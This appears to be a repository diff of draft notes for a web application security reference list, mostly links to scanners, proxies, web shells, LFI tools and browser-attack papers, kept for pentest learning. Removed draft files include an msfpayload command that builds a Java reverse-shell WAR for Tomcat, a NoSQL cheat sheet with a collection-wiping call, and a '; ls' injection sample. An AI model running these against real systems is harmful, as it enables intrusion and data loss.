* It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
[OWASP Web Application Security Testing Cheat Sheet](https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet)
[lan-js](https://github.com/jvennix-r7/lan-js)
* Probe LAN devices from a web browser.
[OWASP Mantra](http://www.getmantra.com/hackery/)
* “OWASP Mantra is a powerful set of tools to make the attacker's task easier”
[MCIR - Magical Code Injection Rainbow](https://github.com/SpiderLabs/MCIR)
* The Magical Code Injection Rainbow! MCIR is a framework for building code injection vulnerability testbeds. MCIR unites SQLol, XMLmao, ShelLOL and XSSmh together in a magical world of code injection! They can experience the magic of feature sharing. Instead of having to wait for unicornFurnace to update each one, all the MCIR friends get updates they can all use! YAY! MCIR is designed to be good at making new friends, and they get to share updates to sanitization routines, environmental factor options, and interface tweaks. If you want to make a new friend to join the dancing and singing in the Magical Code Injection Rainbow, you can use any of the existing MCIR friends as a template and rewrite the portion where the friend does its magic, so we can inject ALL the things! YIPPEE!1
[wikto](https://github.com/sensepost/wikto)
* Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
[OWASP Testing Checklist](https://www.owasp.org/index.php/Testing_Checklist)
###Brute Force/Fuzzing
[Dirbuster](https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)
* DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
[skipfish](https://code.google.com/p/skipfish/)
* Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
[Go Buster](https://github.com/OJ/gobuster)
* Directory/file busting tool written in Go
* Recursive, CLI-based, no java runtime
[WFuzz](https://code.google.com/p/wfuzz/
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc
###CMS's
[Drupal Security Checklist](https://github.com/gfoss/attacking-drupal/blob/master/presentation/drupal-security-checklist.pdf)
[HTTPie - curl for humans](https://github.com/jakubroztocil/httpie)
* HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
[Drupal Attack Scripts](https://github.com/gfoss/attacking-drupal)
* Set of brute force scripts and Checklist
[CMSExplorer](https://code.google.com/p/cms-explorer/)
* CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.
JoomScan: https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project
Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites. No web security scanner is dedicated only one CMS.
[Droopescan](https://github.com/droope/droopescan)
* A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
[Sparty - Sharepoint/Frontpage Auditing Tool](https://github.com/alias1/sparty)
* Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.
[WPScan](https://github.com/wpscanteam/wpscan)
* WPScan is a black box WordPress vulnerability scanner.
[BlindElephant Web Application Fingerprinter](http://blindelephant.sourceforge.net/)
* The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.
Bypassing WAFs](http://www.nethemba.com/bypassing-waf.pdf)
https://xss-game.appspot.com/
###Site/Webapp Scanners
[skipfish](https://code.google.com/p/skipfish/)
* Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
XSS game http://escape.alf.nu/
[wikto](https://github.com/sensepost/wikto)
* Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
[RAWR - Rapid Assessment of Web Resources](https://bitbucket.org/al14s/rawr/wiki/Home)
[Arachni Web Scanner](http://www.arachni-scanner.com/)
* Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.
[Making Mongo Cry Attacking NoSQL for Pen Testers Russell Butturini](https://www.youtube.com/watch?v=NgsesuLpyOg)
###Web Proxies
[Burpsuite](http://portswigger.net/burp/)
* Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
[C02](https://code.google.com/p/burp-co2/)
* Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has it's own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
[ZAP - Zed Attack Proxy](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project)
* The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
[leaps - shared text editing in Golang](https://github.com/denji/leaps)
* Leaps is a service for hosting collaboratively edited documents using operational transforms to ensure zero-collision synchronization across any number of editing clients.
[Paros - Web Proxy](http://sourceforge.net/projects/paros/)
* A Java based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
[Postcards from a Post-XSS World - Michael Zalewski](http://lcamtuf.coredump.cx/postxss/#dangling-markup-injection)
* This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.
###Web Shells
[Weevely](https://github.com/epinna/weevely3)
* Weevely is a command line web shell dinamically extended over the network at runtime used for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments. The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.
* [Getting Started](https://github.com/epinna/weevely3/wiki#getting-started)
[Drupal Attack Scripts](https://github.com/gfoss/attacking-drupal)
* Set of brute force scripts and Checklist
[b374k shell 3.2](https://github.com/b374k/b374k)
* This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser
[Drupal Security Checklist](https://github.com/gfoss/attacking-drupal/blob/master/presentation/drupal-security-checklist.pdf)
[SQL Injection wiki](http://www.sqlinjectionwiki.com/)
[Shadow Daemon](https://shadowd.zecure.org/overview/introduction/)
* Shadow Daemon is a collection of tools to detect, protocol and prevent attacks on web applications. Technically speaking, Shadow Daemon is a web application firewall that intercepts requests and filters out malicious parameters. It is a modular system that separates web application, analysis and interface to increase security, flexibility and expandability. Shadow Daemon is free software. It is released under the license GPLv2, so its source code can be examined, modified and distributed by everyone.
[unindexed](https://github.com/mroth/unindexed/blob/master/README.md)
* The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site, these contributions will also be destroyed when the site deletes itself.
[Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control](http://ericchen.me/self_exfiltration.pdf)
* Abstract —Since the early days of Netscape, browser vendors and web security researchers have restricted out-going data based on its destination. The security argument accompanying these mechanisms is that they prevent sensitive user data from being sent to the attacker’s domain. However, in this paper, we show that regulating web information flow based on its destination server is an inherently flawed security practice. It is vulnerable to self-exfiltration attacks, where an adversary stashes stolen information in the database of a whitelisted site, then later independently connects to the whitelisted site to retrieve the information. We describe eight existing browser security mechanisms that are vulnerable to these “self-exfiltration” attacks. Furthermore, we discovered at least one exfiltration channel for each of the Alexa top 100 websites. None of the existing information flow control mechanisms we surveyed are sufficient to protect data from being leaked to the attacker. Our goal is to prevent browser vendors and researchers from falling into this trap by designing more systems that are vulnerable to self-exfiltration.
[The Devil is in the Constants: Bypassing Defenses in Browser JIT Engines](http://users.ics.forth.gr/~elathan/papers/ndss15.pdf)
* Abstract —Return-oriented programming (ROP) has become the dominant form of vulnerability exploitation in both user and kernel space. Many defenses against ROP exploits exist, which can significantly raise the bar against attackers. Although protecting existing code, such as applications and the kernel, might be possible, taking countermeasures against dynamic code, i.e., code that is generated only at run-time, is much harder. Attackers have already started exploiting Just-in-Time (JIT) engines, available in all modern browsers, to introduce their (shell)code (either native code or re-usable gadgets) during JIT compilation, and then taking advantage of it. Recognizing this immediate threat, browser vendors started employing defenses for hardening their JIT engines. In this paper, we show that—no matter the employed defenses—JIT engines are still exploitable using solely dynamically generated gadgets. We demonstrate that dynamic ROP payload construction is possible in two modern web browsers without using any of the available gadgets contained in the browser binary or linked libraries. First, we exploit an open source JIT engine (Mozilla Firefox) by feeding it malicious JavaScript, which once processed generates all re- quired gadgets for running any shellcode successfully. Second, we exploit a proprietary JIT engine, the one in the 64-bit Microsoft Internet Explorer, which employs many undocumented, specially crafted defenses against JIT exploitation. We manage to bypass all of them and create the required gadgets for running any shellcode successfully. All defensive techniques are documented in this paper to assist other researchers. Furthermore, besides showing how to construct ROP gadgets on-the-fly, we also show how to discover them on-the-fly, rendering current randomization schemes ineffective. Finally, we perform an analysis of the most important defense currently employed, namely constant blinding , which shields all three-byte or larger immediate values in the JIT buffer for hindering the construction of ROP gadgets. Our analysis suggests that extending constant blinding to all immediate values (i.e., shielding 1-byte and 2-byte constants) dramatically decreases the JIT engine’s performance, introducing up to 80% additional instructions
###Securing Web Applications
###Non-Attack Writeups
[Security and Open Redirects Impact of 301-ing people in 2013](https://makensi.es/rvl/openredirs/#/)
[DOM Clobbering Attack](http://www.thespanner.co.uk/2013/05/16/dom-clobbering/)
###Securing Web Applications/Checklists
[Center for Internet Security Apache Server 2.4 Hardening Guide](https://benchmarks.cisecurity.org/tools2/apache/CIS_Apache_HTTP_Server_2.4_Benchmark_v1.1.0.pdf)
[Securing Web Application Technologies Checklist](http://www.securingthehuman.org/developer/swat)
[OWASP Testing Checklist](https://www.owasp.org/index.php/Testing_Checklist)
[WebAppSec Testing Checklist](http://tuppad.com/blog/wp-content/uploads/2012/03/WebApp_Sec_Testing_Checklist.pdf)
[OWASP Web Application Security Testing Cheat Sheet](https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet)
[Magical Code Injection Rainbow Framework](https://github.com/SpiderLabs/MCIR)
* The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds. Has testing lessons for xss/csrf/sql
###Web Application Firewalls
###LFI & RFI
[LFI Local File Inclusion Techniques (paper)](http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/)
* This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
* [Update: a third (known) technique has been dissected here](http://www_ush_it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/ )
[ModSecurity](https://github.com/SpiderLabs/ModSecurity)
* ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx that is developed by Trustwave's SpiderLabs. It has a robust event-based programming language which provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analys
[Shadow Daemon](https://shadowd.zecure.org/overview/introduction/)
* Shadow Daemon is a collection of tools to detect, protocol and prevent attacks on web applications. Technically speaking, Shadow Daemon is a web application firewall that intercepts requests and filters out malicious parameters. It is a modular system that separates web application, analysis and interface to increase security, flexibility and expandability. Shadow Daemon is free software. It is released under the license GPLv2, so its source code can be examined, modified and distributed by everyone.
[Liffy](https://github.com/rotlogix/liffy)
* Liffy is a Local File Inclusion Exploitation tool.
Current features include:
data:// for code execution
expect:// for code execution
input:// for code execution
filter:// for arbitrary file reads
/proc/self/environ for code execution in CGI mode
Apache access.log poisoning
Linux auth.log SSH poisoning
Direct payload delivery with no stager
Support for absolute and relative paths
Support for cookies
! I have had issues with access log poisoning on current versions of Apache. This not an issue with the payload delivery and or poisoning. This is more of an issue with the request after the poisoning to kick off your shell. This may require a browser refresh.
[Bypassing WAFs](http://www.nethemba.com/bypassing-waf.pdf)
###Web Application Attacks & Write-ups
[Relative Path Overwrite Explanation/Writeup](http://www.thespanner.co.uk/2014/03/21/rpo/)
* RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.
[Attacking Adobe ColdFusion](http://jumpespjump.blogspot.com/2014/03/attacking-adobe-coldfusion.html)
[ColdFusion Security Resources](https://www.owasp.org/index.php/ColdFusion_Security_Resources)
[ColdFusion for Penetration Testers](http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers)
###HTML 5
[SH5ARK](http://sh5ark.professionallyevil.com)
* The Securing HTML5 Assessment Resource Kit, or SH5ARK, is an open source project that provides a repository of HTML5 features, proof-of-concept attack code, and filtering rules. The purpose of this project is to provide a single repository that can be used to collect sample code of vulnerable HTML5 features, actual attack code, and filtering rules to help prevent attacks and abuse of these features. The intent of the project is to bring awareness to the opportunities that HTML5 is providing for attackers, to help identify these attacks, and provide measures for preventing them
* [Presentation on SH5ARK](https://www.youtube.com/watch?v=1ZZ-vIwmWx4)
###LFI & RFI
* [GetSH5ARK here](http://sourceforge.net/projects/sh5ark/)
[LFI Local File Inclusion Techniques (paper)](http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/)
* This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
* [Update: a third (known) technique has been dissected here](http://www_ush_it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/ )
[Liffy](https://github.com/rotlogix/liffy)
* Liffy is a Local File Inclusion Exploitation tool.
###XSS
[Writing an XSS Worm](http://blog.gdssecurity.com/labs/2013/5/8/writing-an-xss-worm.html)
##(NO)SQL Injection
##(NO)SQL Injection
[SQL Injection Cheat Sheet](http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/)
[SQL Injection wiki](http://www.sqlinjectionwiki.com/)
[SQL Injection Knowledge Base](http://websec.ca/kb/sql_injection#MySQL_Testing_Injection)
@ -194,9 +241,9 @@ Support for cookies
[Laduanum](http://laudanum.sourceforge.net/)
* “Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.”
[Making Mongo Cry Attacking NoSQL for Pen Testers Russell Butturini](https://www.youtube.com/watch?v=NgsesuLpyOg)
[MongoDB: Typical Security Weaknesses in a NoSQL DB](http://blog.spiderlabs.com/2013/03/mongodb-security-weaknesses-in-a-typical-nosql-database.html)
@ -219,4 +266,52 @@ Impidence mismatch
Bypass addslashes()
Bypassing mysql_real_escape_string. (under special conditions)
Stacked SQL injections.
Secondary channel extraction
Secondary channel extraction
###HTML 5
[SH5ARK](http://sh5ark.professionallyevil.com)
* The Securing HTML5 Assessment Resource Kit, or SH5ARK, is an open source project that provides a repository of HTML5 features, proof-of-concept attack code, and filtering rules. The purpose of this project is to provide a single repository that can be used to collect sample code of vulnerable HTML5 features, actual attack code, and filtering rules to help prevent attacks and abuse of these features. The intent of the project is to bring awareness to the opportunities that HTML5 is providing for attackers, to help identify these attacks, and provide measures for preventing them
* [Presentation on SH5ARK](https://www.youtube.com/watch?v=1ZZ-vIwmWx4)
* [GetSH5ARK here](http://sourceforge.net/projects/sh5ark/)
###Papers
[The Spy in the Sandbox – Practical Cache Attacks in Javascript](http://iss.oy.ne.ro/SpyInTheSandbox.pdf)
* We present the first micro-architectural side-channel at- tack which runs entirely in the browser. In contrast to other works in this genre, this attack does not require the attacker to install any software on the victim’s machine – to facilitate the attack, the victim needs only to browse to an untrusted webpage with attacker-controlled con- tent. This makes the attack model highly scalable and ex- tremely relevant and practical to today’s web, especially since most desktop browsers currently accessing the In- ternet are vulnerable to this attack. Our attack, which is an extension of the last-level cache attacks of Yarom et al. [23], allows a remote adversary recover information belonging to other processes, other users and even other virtual machines running on the same physical host as the victim web browser. We describe the fundamentals behind our attack, evaluate its performance using a high bandwidth covert channel and finally use it to construct a system-wide mouse/network activity logger. Defending against this attack is possible, but the required counter- measures can exact an impractical cost on other benign uses of the web browser and of the computer.
[Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control](http://ericchen.me/self_exfiltration.pdf)
* Abstract —Since the early days of Netscape, browser vendors and web security researchers have restricted out-going data based on its destination. The security argument accompanying these mechanisms is that they prevent sensitive user data from being sent to the attacker’s domain. However, in this paper, we show that regulating web information flow based on its destination server is an inherently flawed security practice. It is vulnerable to self-exfiltration attacks, where an adversary stashes stolen information in the database of a whitelisted site, then later independently connects to the whitelisted site to retrieve the information. We describe eight existing browser security mechanisms that are vulnerable to these “self-exfiltration” attacks. Furthermore, we discovered at least one exfiltration channel for each of the Alexa top 100 websites. None of the existing information flow control mechanisms we surveyed are sufficient to protect data from being leaked to the attacker. Our goal is to prevent browser vendors and researchers from falling into this trap by designing more systems that are vulnerable to self-exfiltration.
[The Devil is in the Constants: Bypassing Defenses in Browser JIT Engines](http://users.ics.forth.gr/~elathan/papers/ndss15.pdf)
* Abstract —Return-oriented programming (ROP) has become the dominant form of vulnerability exploitation in both user and kernel space. Many defenses against ROP exploits exist, which can significantly raise the bar against attackers. Although protecting existing code, such as applications and the kernel, might be possible, taking countermeasures against dynamic code, i.e., code that is generated only at run-time, is much harder. Attackers have already started exploiting Just-in-Time (JIT) engines, available in all modern browsers, to introduce their (shell)code (either native code or re-usable gadgets) during JIT compilation, and then taking advantage of it. Recognizing this immediate threat, browser vendors started employing defenses for hardening their JIT engines. In this paper, we show that—no matter the employed defenses—JIT engines are still exploitable using solely dynamically generated gadgets. We demonstrate that dynamic ROP payload construction is possible in two modern web browsers without using any of the available gadgets contained in the browser binary or linked libraries. First, we exploit an open source JIT engine (Mozilla Firefox) by feeding it malicious JavaScript, which once processed generates all re- quired gadgets for running any shellcode successfully. Second, we exploit a proprietary JIT engine, the one in the 64-bit Microsoft Internet Explorer, which employs many undocumented, specially crafted defenses against JIT exploitation. We manage to bypass all of them and create the required gadgets for running any shellcode successfully. All defensive techniques are documented in this paper to assist other researchers. Furthermore, besides showing how to construct ROP gadgets on-the-fly, we also show how to discover them on-the-fly, rendering current randomization schemes ineffective. Finally, we perform an analysis of the most important defense currently employed, namely constant blinding , which shields all three-byte or larger immediate values in the JIT buffer for hindering the construction of ROP gadgets. Our analysis suggests that extending constant blinding to all immediate values (i.e., shielding 1-byte and 2-byte constants) dramatically decreases the JIT engine’s performance, introducing up to 80% additional instructions.
[Cookieless Monster: Exploring the Ecosystem of Web-based Device Fingerprinting](http://securitee.org/files/cookieless_sp2013.pdf)
* Abstract —The web has become an essential part of our society and is currently the main medium of information delivery. Billions of users browse the web on a daily basis, and there are single websites that have reached over one billion user accounts. In this environment, the ability to track users and their online habits can be very lucrative for advertising companies, yet very intrusive for the privacy of users. In this paper, we examine how web-based device fingerprint- ing currently works on the Internet. By analyzing the code of three popular browser-fingerprinting code providers, we reveal the techniques that allow websites to track users without the need of client-side identifiers. Among these techniques, we show how current commercial fingerprinting approaches use questionable practices, such as the circumvention of HTTP proxies to discover a user’s real IP address and the installation of intrusive browser plugins. At the same time, we show how fragile the browser ecosystem is against fingerprinting through the use of novel browser- identifying techniques. With so many different vendors involved in browser development, we demonstrate how one can use diversions in the browsers’ implementation to distinguish successfully not only the browser-family, but also specific major and minor versions. Browser extensions that help users spoof the user-agent of their browsers are also evaluated. We show that current commercial approaches can bypass the extensions, and, in addition, take advantage of their shortcomings by using them as additional fingerprinting features.
[SSL/TLS Interception Proxies and Transitive Trust](http://media.blackhat.com/bh-eu-12/Jarmoc/bh-eu-12-Jarmoc-SSL_TLS_Interception-WP.pdf)
* Secure Sockets Layer (SSL) [ 1 ] and its successor Transport Layer Security (TLS) [ 2 ] have become key components of the modern Internet . The privacy, integrity, and authenticity [ 3 ] [ 4 ] provided by these protocols are critical to allowing sensitive communications to occur . Without these systems, e - commerce, online banking , and business - to - business exchange of information would likely be far less frequent. Threat actors have also recognized the benefits of transport security, and they are increasingly turning to SSL to hide their activities . Advanced Persistent Threat ( APT ) attackers [ 5 ] , botnets [ 6 ] , and eve n commodity web attacks can leverage SSL encryption to evade detection. To counter these tactics, organizations are increasingly deploying security controls that intercept end - to - end encrypted channels. Web proxies, data loss prevention ( DLP ) systems, spec ialized threat detection solutions, and network intrusion prevention systems ( N IPS ) offer functionality to intercept, inspect , and filter encrypted traffic. Similar functionality is present in lawful intercept systems and solutions enabling the broad surve illance of encrypted communications by governments. Broadly classified as “SSL/TLS interception proxies ,” these solutions act as a “ man in the middle , ” violating the end - to - end security promises of SSL. This type of interception comes at a cost . Intercepti ng SSL - encrypted connections sacrifices a degree of privacy and integrity for the benefit of content inspection, often at the risk of authenticity and endpoint validation . Implementers and designers of SSL interception proxies should consider these risks and understand how their systems operate in unusual circumstances
###Miscellaneous
[unindexed](https://github.com/mroth/unindexed/blob/master/README.md)
* The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site, these contributions will also be destroyed when the site deletes itself.
[COWL: A Confinement System for the Web](http://cowl.ws/)
* Robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content.
[Paper](http://www.scs.stanford.edu/~deian/pubs/stefan:2014:protecting.pdf)

+ 0
- 36
Draft/Draft/Web Applications/Add.txt View File

@ -1,36 +0,0 @@
Add content for:
BlindElephant
Sparty
https://github.com/alias1/sparty
Audit Frontpage/Sharepoint sites
Droopescan
https://github.com/droope/droopescan
A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
CMS-Explorer
XSS attack examples/ideas
Github dorks - finding vulns
http://blog.conviso.com.br/2013/06/github-hacking-for-fun-and-sensitive.html
http://www.html5rocks.com/en/tutorials/security/content-security-policy/
Arachni Web Scanner
http://www.arachni-scanner.com/
Prompt.ml - XSS challenges
Intro to content Security Policy
www.html5rocks.com/en/tutorials/security/content-security-policy/

+ 0
- 79
Draft/Draft/Web Applications/Cull integrate.txt View File

@ -1,79 +0,0 @@
[Go Buster](https://github.com/OJ/gobuster)
* Directory/file busting tool written in Go
* Recursive, CLI-based, no java runtime
[DOM Clobbering Attack](http://www.thespanner.co.uk/2013/05/16/dom-clobbering/)
[Postcards from a Post-XSS World - Michael Zalewski](http://lcamtuf.coredump.cx/postxss/#dangling-markup-injection)
[Postcards from a Post-XSS World - Michael Zalewski](http://lcamtuf.coredump.cx/postxss/#dangling-markup-injection)
* This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.
[Relative Path Overwrite Explanation/Writeup](http://www.thespanner.co.uk/2014/03/21/rpo/)
* RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.
[lan-js](https://github.com/jvennix-r7/lan-js)
* Probe LAN devices from a web browser.
http
[MozillaRecovery](https://github.com/gtfy/MozillaRecovery)
* Recovers the master password of key3.db files, i.e. Thunderbird, Firefox
[Javascript De-Obfuscation Tools Redux](http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/)
* Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.
Intro to Content Security Policy
http://www.html5rocks.com/en/tutorials/security/content-security-policy/
Securing Web Application Technologies Checklist
http://www.securingthehuman.org/developer/swat
Client Identification Mechanisms
http://www.chromium.org/Home/chromium-security/client-identification-mechanisms
RAWR - Rapid Assessment of Web Resources
https://bitbucket.org/al14s/rawr/wiki/Home
COWL: A Confinement System for the Web
robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content.
http://cowl.ws/
http://www.scs.stanford.edu/~deian/pubs/stefan:2014:protecting.pdf
List of modules in Co2: https://code.google.com/p/burp-co2/wiki/Co2Modules
Help page: http://co2.professionallyevil.com/help.php
A collection of enhancements for Portswigger's popuplar Burp Suite web penetration testing tool.
https://code.google.com/p/burp-co2/
Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has it's own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
OWASP Mantra
http://www.getmantra.com/hackery/
“OWASP Mantra is a powerful set of tools to make the attacker's task easier”
Bradamsa
https://github.com/ikkisoft/bradamsa
Burp Suite extension to generate Intruder payloads using Radamsa

+ 0
- 36
Draft/Draft/Web Applications/Databases.txt View File

@ -1,36 +0,0 @@
##Databases
###NoSQL
NoSQL
[MongoDB: Typical Security Weaknesses in a NoSQL DB](http://blog.spiderlabs.com/2013/03/mongodb-security-weaknesses-in-a-typical-nosql-database.html)
Cheat sheet
NoSQL-injection Cheat Sheet
? db.getName() – Get current DB name
? db.members.count() – Get number of documents in the collection
? db.members.validate({ full : true}) – Get ALL information about this
collection
? db.members.stats() – Get information about this collection
? db.members.remove() – remove all documents from current collection
? db.members.find().skip(0).limit(1) – Get documents from DB (Change only
number in skip() function)
? db.getMongo().getDBNames().toString() – Get the list of all DBs
? db.members.find()[0][‘pass’] – Get “pass” value from current collection]
Firstov Mikhail

+ 0
- 22
Draft/Draft/Web Applications/General Tips Trick.txt View File

@ -1,22 +0,0 @@
Fix up
Generating payload for Tomcat
msfpayload java/shell/reverse_tcp LHOST=192.168.1.6 W > colesec.war
Tomcat does not have default creds however, when packaged up, it generally has creds similar across distributions.
Use auxiliary/scanner/http/tomcat_mgr_login
http://kaoticcreations.blogspot.com/2012/11/hacking-cold-fusion-servers-part-i.html
Code Injection:
https://www.owasp.org/index.php/Code_Injection
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
allowed characters (standard regular expressions classes or custom)
data format
amount of expected data
Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.
; ls

+ 0
- 30
Draft/Draft/Web Applications/Securing Web Applications.txt View File

@ -1,30 +0,0 @@
Securing Web Applications